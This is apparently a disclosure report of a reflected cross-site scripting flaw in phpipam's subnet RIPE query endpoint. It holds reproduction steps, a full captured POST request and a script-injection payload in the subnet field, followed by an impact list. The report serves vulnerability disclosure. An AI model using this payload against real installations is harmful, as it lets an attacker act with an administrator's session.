Cross-site Scripting (XSS) - Reflected in phpipam/phpipam
Jan 28th 2022
Reflected XSS attacks AKA non-persistent attacks when a malicious script is reflected off of a web application to the victim’s browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The vulnerability is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application’s functions and the activation of malicious scripts.
Proof of Concept
Steps to Reproduce:- Login in to webAPP using Admin Creds. Navigate to SubNET "http://localhost/phpipam/index.php?page=subnets§ion=1" Choose any SubNet and Click on Edit Click on Get Information button of SubNet Input field ANd Capture The Request using proxy tool and Change SubNet IP to XSS PayLoad As you see in my below POST REQUEST ======================================================================================= POST /phpipam/app/admin/subnets/ripe-query.php HTTP/1.1 Host: localhost Content-Length: 47 sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Cookie: phpipam=keqtftn3sihc7kbu6m79rdlis0; Connection: close subnet=<script>alert(document.domain);</script>
Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.